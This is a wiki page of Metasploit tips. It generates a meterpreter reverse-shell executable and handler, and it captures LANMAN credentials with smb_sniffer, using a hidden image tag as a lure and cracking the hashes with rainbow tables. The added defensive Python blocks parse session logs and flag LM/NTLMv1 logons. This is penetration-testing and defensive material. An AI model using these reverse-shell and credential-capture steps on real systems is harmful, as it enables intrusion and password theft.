Difference between revisions of "Metasploit/TipsyTrucos"

Seath (talk | contribs.)
m (No edit summary)
* Some payloads may not work correctly with every exploit; once you have control of execution flow, try several payloads.
 
== Using Metasploit Exploit-less Handlers (Executable Payloads) ==
 
At some point while using Metasploit you will need to run a payload without an exploit. This is possible with the multi/handler exploit module.
* This needs input.
 
Step 1. Generate your executable payload:
 
<pre>
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > met-reverse.exe
</pre>
 
Step 2. Start the multi/handler listener:
<pre>
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
</pre>
 
Step 3. Run the executable and interact:
<pre>
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
meterpreter >
</pre>
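The handler output above is the record of what happened during a test, and the one line worth keeping is the session line, because it carries the connection tuple that firewall or flow logs will show. The following is an added example, not part of the original page and not Metasploit code; the transcript constant is copied from step 3, and the function and class names are this example's own.

```python
"""Turn multi/handler console output into structured session records.
Added example (not from the page and not Metasploit code): the transcript
below is the handler output shown in step 3; the names are this example's own."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Transcript copied from step 3. The stager/stage lines are what a staged
# payload such as windows/meterpreter/reverse_tcp produces.
HANDLER_OUTPUT = """\
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
meterpreter >
"""

# "[*] <kind> session <id> opened (<lhost>:<lport> -> <rhost>:<rport>)"
SESSION_RE = re.compile(
    r"\[\*\] (?P<kind>.+?) session (?P<id>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)"
)
STAGE_RE = re.compile(r"\[\*\] Sending stage \((?P<size>\d+) bytes\)")


@dataclass
class Session:
    kind: str                  # e.g. "Meterpreter"
    session_id: int
    lhost: str                 # handler address (LHOST)
    lport: int                 # handler port (LPORT)
    rhost: str                 # target that connected back
    rport: int                 # ephemeral port on the target
    stage_bytes: Optional[int]  # size of the stage sent before the session opened


def parse_handler_output(text: str) -> List[Session]:
    """Collect every 'session opened' line, attaching the preceding stage size."""
    sessions: List[Session] = []
    pending_stage: Optional[int] = None
    for line in text.splitlines():
        m = STAGE_RE.search(line)
        if m:
            pending_stage = int(m["size"])
            continue
        m = SESSION_RE.search(line)
        if m:
            sessions.append(Session(m["kind"], int(m["id"]),
                                    m["lhost"], int(m["lport"]),
                                    m["rhost"], int(m["rport"]), pending_stage))
            pending_stage = None
    return sessions


def connection_as_seen_on_the_wire(s: Session) -> dict:
    """The handler prints LHOST:LPORT -> RHOST:RPORT, but with a reverse
    payload the TCP connection is initiated by the target, so a firewall or
    flow log records it in the opposite direction."""
    return {"src": s.rhost, "sport": s.rport, "dst": s.lhost, "dport": s.lport}


if __name__ == "__main__":
    for s in parse_handler_output(HANDLER_OUTPUT):
        print(s)
        print("search logs for:", connection_as_seen_on_the_wire(s))
```

The direction swap in the last function is the point: a reverse payload means the target opens the connection, so the log query built from the handler line must use the target as the source.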
 
== LM Half-Challenge ==
 
Originally blogged [http://grutztopia.jingojango.net/2007/04/ntlmv1-metasploit-and-you.html here] - Using the [http://www.freerainbowtables.com/index-rainbowtables-tables-halflmchall.html Free Rainbow Tables HALFLMCHALL Tables] and a modified Metasploit 2.7 smb_sniffer exploit module, obtaining and cracking LANMAN Challenges has never been easier.
 
'''Step 1.''' Use Metasploit 2.7 (for now) and the updated [http://grutz.jingojango.net/exploits/smb_sniffer.pm smb_sniffer.pm] exploit module. This does not work on a Windows platform.
 
'''Step 2.''' Unpack Msf2.7 and place smb_sniffer.pm under the exploits/ directory, replacing the older version.
 
'''Step 3.''' Set up your Metasploit and run it as root
 
<pre>
framework-2.7 $ sudo ./msfconsole
Password:
 
 
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 
 
+ -- --=[ msfconsole v2.7 [161 exploits - 76 payloads]
 
msf > use smb_sniffer
msf smb_sniffer > show options
 
Exploit Options
===============
 
Exploit:  Name     Default         Description
--------  -------  --------------  -----------------------------------------------
optional  KEY      \x11"3DUfw\x88  The Challenge key
optional  PWFILE                   The PWdump format log file (optional)
optional  LOGFILE  smbsniff.log    The path for the optional log file
required  LHOST    0.0.0.0         The IP address to bind the SMB service to
optional  UID      0               The user ID to switch to after opening the port
required  LPORT    139             The SMB server port
 
Target: Targetless Exploit
 
msf smb_sniffer > set PWFILE=/tmp/pwtest.txt
PWFILE=/tmp/pwtest.txt:
msf smb_sniffer > exploit
[*] Listener created, switching to userid 0
[*] Starting SMB Password Service
</pre>
 
'''Step 4.''' Have somebody connect to your server. It can be as simple as a "dir \\serverip\share" or an "<img src=\\serverip\share\file.gif height=0 width=0>" tag on some HTML page. Windows will attempt to make the connection and send the logged-in user's credentials to your waiting server.
 
[[Image:Metasploit-27-smbsniffer.png]]
 
'''Step 5.''' Take your new pwtest.txt file and copy it over to a Cain & Abel machine that has the HALFLMCHALL tables.
 
[[Image:Metasploit-27-smbsniff-pw.png]]
 
[[Image:Metasploit-27-cainadd.png]]
 
'''Step 6.''' Select the hash you want to crack, right click and select Cryptanalysis Attack->HALFLM Hashes + challenge->via RainbowTables, add the tables, and crack!
 
[[Image:Metasploit-27-cainsuccesshalflm.png]]
 
'''Caveats'''
 
* Only LANMAN hashes can be obtained this way. If the client refuses LM, then too bad.
* Only the first 7 characters are in the tables. You have to brute-force the rest.
* The tables are 54 GB total. It will take some time to load and search.
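The first caveat is also the defender's lever: a client that no longer sends an LM response gives this capture nothing to crack, and a client at NTLMv1 is still exposed to a chosen-challenge attack even without the half-LM tables. The following is an added example, not part of the original page, that finds such clients from logon events. The event records are constructed to mirror the text fields of Windows Security event 4624 ("Authentication Package", "Package Name (NTLM only)") and are not real log data; the function and class names are this example's own.

```python
"""Flag logons that used LM or NTLMv1, the response types the smb_sniffer
capture above can make use of. Added example, not part of the original page;
the event records are constructed in the layout of Security event 4624."""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: four logon events, two of them with weak packages.
SAMPLE_EVENTS = """\
EventID: 4624
Account Name: alice
Workstation Name: WS01
Authentication Package: NTLM
Package Name (NTLM only): LM
Source Network Address: 192.168.1.2
---
EventID: 4624
Account Name: bob
Workstation Name: WS02
Authentication Package: NTLM
Package Name (NTLM only): NTLM V2
Source Network Address: 192.168.1.3
---
EventID: 4624
Account Name: carol
Workstation Name: WS03
Authentication Package: Kerberos
Package Name (NTLM only): -
Source Network Address: 192.168.1.4
---
EventID: 4624
Account Name: dave
Workstation Name: WS04
Authentication Package: NTLM
Package Name (NTLM only): NTLM V1
Source Network Address: 192.168.1.5
"""

# Why each package matters for the technique described on this page.
WEAK_PACKAGES = {
    "LM": "LM response: the first 8 bytes depend only on the first 7 password "
          "characters, so the HALFLMCHALL tables apply directly",
    "NTLM V1": "NTLMv1 response: no LM response, but still a DES-based "
               "answer to a server-chosen challenge",
}


@dataclass
class Finding:
    account: str
    workstation: str
    source: str
    package: str
    reason: str


FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_events(text: str) -> List[dict]:
    """Split the record text on '---' separators and parse 'Key: value' lines."""
    events = []
    for block in text.split("---"):
        fields = {}
        for line in block.strip().splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m["key"].strip()] = m["value"].strip()
        if fields:
            events.append(fields)
    return events


def weak_auth_findings(events: List[dict]) -> List[Finding]:
    """One Finding per successful NTLM logon whose package name is LM or NTLM V1."""
    findings = []
    for ev in events:
        if ev.get("EventID") != "4624" or ev.get("Authentication Package") != "NTLM":
            continue
        pkg = ev.get("Package Name (NTLM only)", "")
        if pkg in WEAK_PACKAGES:
            findings.append(Finding(ev.get("Account Name", "?"),
                                    ev.get("Workstation Name", "?"),
                                    ev.get("Source Network Address", "?"),
                                    pkg, WEAK_PACKAGES[pkg]))
    return findings


def lm_response_sent(lm_compatibility_level: int) -> bool:
    """Whether a client at this LmCompatibilityLevel (HKLM\\SYSTEM\\CurrentControlSet\\
    Control\\Lsa) still sends an LM response: levels 0 and 1 send LM and NTLM,
    level 2 sends NTLM only, levels 3 to 5 send NTLMv2 only."""
    return lm_compatibility_level <= 1


if __name__ == "__main__":
    for f in weak_auth_findings(parse_events(SAMPLE_EVENTS)):
        print(f"{f.account}@{f.workstation} from {f.source}: {f.package} - {f.reason}")
```

Run against real 4624 events exported as text, the same field names apply; a client that turns up with "LM" is one that would have been captured by the server in step 4, and raising its LmCompatibilityLevel to 2 or higher is what makes the first caveat bite.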